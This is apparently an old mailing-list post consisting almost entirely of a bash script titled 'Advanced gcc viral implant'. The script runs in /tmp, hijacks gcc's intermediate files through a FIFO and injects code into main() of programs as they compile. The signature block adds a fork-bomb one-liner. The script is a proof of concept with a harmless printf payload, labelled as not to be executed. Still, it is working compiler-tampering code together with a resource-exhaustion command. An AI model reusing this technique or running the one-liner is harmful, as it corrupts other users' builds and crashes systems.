-- #!/bin/bash # Advanced gcc viral implant # by Michal Zalewski (lcamtuf@staszic.waw.pl) # ** EXECUTION PROHIBITED **CC1=`find /usr/lib/gcc-lib -name cc1` VICT=0 renice +20 $PPID >&/dev/null cd /tmp echo "I'm free, I'm free! Oh, I'm free..." while :; do V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."` if [ ! "$V" = "" ]; then mkfifo -m 666 ${V}.s &>/dev/null if [ -p ${V}.s ]; then sleep 1 cat ${V}.i|awk 'match($2,"main")==1{x=1};y!=1&&x==1&&match($1,"(">0){y=1;print "printf(\"This program has been infected!\\n\");"};{print $0}'>.lv$$.i $CC1 .lv$$.i cat ${V}.s>/dev/null cat .lv$$.s >${V}.s let VICT=VICT+1 echo "Someone has been just trapped ($VICT)." fi rm -f .lv$$.* ${V}.s &>/dev/null fi done
--_______________________________________________________________________ Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl] Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=